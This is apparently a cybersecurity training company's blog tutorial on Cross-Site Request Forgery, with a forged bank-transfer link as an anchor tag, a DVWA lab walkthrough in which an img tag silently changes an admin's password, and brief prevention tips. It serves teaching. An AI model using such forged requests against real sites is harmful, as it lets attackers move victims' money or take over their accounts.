fbpx

Cross-Site Request Forgery(CSRF) | Web App Vulnerability

Cross-Site Request Forgery also known as CSRF, XSRF, sea surfing, the one-click attack is another common web application web vulnerability. It tricks the user’s web browser to do the things it doesn’t intend to do.

The attacker tricks the victim browser into generating requests to a website that performs certain actions on behalf of the user logged in. It is a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts.

Basically, CSRF is an attack which forces authenticated user of the web to send a malicious web request.

There CSRF can be of any type, but the primary types are

  1. POST Request Based
  2. GET request Based
  3. JSON request

How CSRF works?

Let’s see how this CSRF attacks works in web browser.

Consider a bank web application which sends money to other user using there usernames.

Consider the following URL is making request to a web application to transfer the funds to other account.

http://indiabank.com/transfer.do?acc=personA&ammount=$100

The hacker might create a malicious script to transfer the money to their account.

Now the URL will look like this

http://indiabank.com/transfer.do?acc=attacker&ammount=$100

Now, the hacker can just add some code and use some social engineering to let you click on the link.

For exmaple.

<a href = http://indiabank.com/transfer.do?acc=attacker&ammount=$100>Please click me!</a>

Now, If anyone clicks on PLEASE CLICK ME! button end up initiating a 100 dollar transfer to attackers account.

This is a basic example of Cross-site request forgery attack.

Let’s do a quick CSRF attack using the DVWA ( Damn vulnerable web application ) as we have used it in the previous blog for cross-site scripting attack.

cross site request forgery

This is how the home page for testing CSRF looks like on DVWA.

Here, we have to change our admin password.

So, let’s just do some recon on how the URL looks if we change the password or what GET request it will send.

As you can see the web app is sending a GET request to change the password.

So now I, the hacker will create a malicious website to trick the admin to change the password that I know. Let’s make one.

So that now hacker have created a decent website and when the victim loads the webpage the password will change to whatever hacker wants.

This is the code of the website, Here you can see there is img tag with the malicious link which will change the victim’s password to ‘hacked’.

This is how a basic CSRF is performed.

Impact of CSRF

The impact of CSRF is very high on an individual or organization. If the one who caught in CSRF is the normal person (s)he could end up losing all the personal account and data, and if the person is admin of and organisation the whole organization is going to be compromised with just a small and lethal CSRF vulnerability.

How to Prevent CSRF?

  1. Always use an anti-csrf token on your website.
  2. Use Samsite cookie attribution to send cookie.
  3. Use authentication for sensitive action.
  4. Always be aware of new types of attacks and forgery

for more go to our blogs

Share the Post...
WhatsApp

About Cybervie

Cybervie provides best cyber security training program in hyderabad, India.This cyber security course enables you to detect vulnerablities of a system, wardoff attacks and manage emergency situations. Taking a proactive approach to security that can help organisations to protect their data, Cybervie has designed its training module based on the cyber security industry requirements with three levels of training in both offensive and defensive manner, and use real time scenarios which can help our students to understand the market up-to its standard certification which is an add on advantage for our students to stand out of competition in an cyber security interview.

More Info – Click Here

Recent Posts

Follow Us on Youtube

Cyber Security Training Program 2020

Cyber security Course offered by Cybervie prepares students for a path of success in a highly demanding and rapidly growing field of cyber security. The course is completely designed with an adaptable mindset, where the program allows the student to complete the course work at their own pace while being able to complete weekly assignments. Hence, also making it convenient for busy working professionals to pursue the training to help them advance their career in cyber security.

Cybervie has designed the training module based on the cyber security industry requirements in both offensive and defensive manner, using real time scenarios which help our students to understand the market standards.

Sign up for our Newsletter

Interested in Cyber Security Training Program 2020 – Click Here

Open chat
1
Hello 👋
How can we help you?